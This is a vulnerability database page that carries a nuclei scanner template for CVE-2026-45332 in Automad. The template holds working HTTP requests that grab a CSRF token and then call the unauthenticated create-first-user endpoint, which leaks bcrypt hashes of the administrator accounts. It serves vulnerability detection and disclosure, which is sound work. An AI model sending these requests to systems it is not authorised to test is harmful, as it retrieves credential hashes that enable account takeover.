Lucene search
+L

Automad < 2.0.0-beta.28 - Unauthenticated Admin Password Hash Disclosure

🗓️ 15 Aug 2026 02:21:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Unauthenticated access to Automad's create-first-user endpoint leaks bcrypt hashes of all admin accounts.

Related
Refs
Code
id: CVE-2026-45332

info:
  name: Automad < 2.0.0-beta.28 - Unauthenticated Admin Password Hash Disclosure
  author: str4k3r
  severity: high
  description: |
    Automad 2.0.0-alpha.1 to 2.0.0-beta.27 contains a broken access control vulnerability caused by publicly accessible /_api/user-collection/create-first-user endpoint returning full serialized user data, letting unauthenticated attackers retrieve bcrypt password hashes of all administrator accounts, exploit requires the endpoint to remain publicly accessible after initial setup.
  impact: |
    Unauthenticated attackers can retrieve bcrypt password hashes of all administrator accounts, risking credential compromise and full system takeover.
  remediation: |
    Upgrade to version 2.0.0-beta.28 or later.
  reference:
    - https://github.com/marcantondahmen/automad/security/advisories/GHSA-xm76-r88j-vm3g
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45332
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-45332
    epss-score: 0.00298
    epss-percentile: 0.22263
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    product: automad
    vendor: marcantondahmen
  tags: cve,cve2026,automad,exposure,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /dashboard/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        internal: true
        regex:
          - 'name="csrf" content="([a-f0-9]+)"'

  - raw:
      - |
        POST /_api/user-collection/create-first-user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __csrf__={{csrf_token}}&username=nuclei_check&password1=Nuclei-Check-Pw1!&password2=Nuclei-Check-Pw1!&email=nuclei-check%40example.local

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'passwordHash'
          - 'accounts.php'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207983988c7992eaa440683669084deaa51edd6c36160cec627898a3d39cebf725022100bc8cf0e0b04b53c150d487951f0b441a75af7a20d8faee02e0075f441ef74add:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2026 21:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.17.5
EPSS0.00298
SSVC
5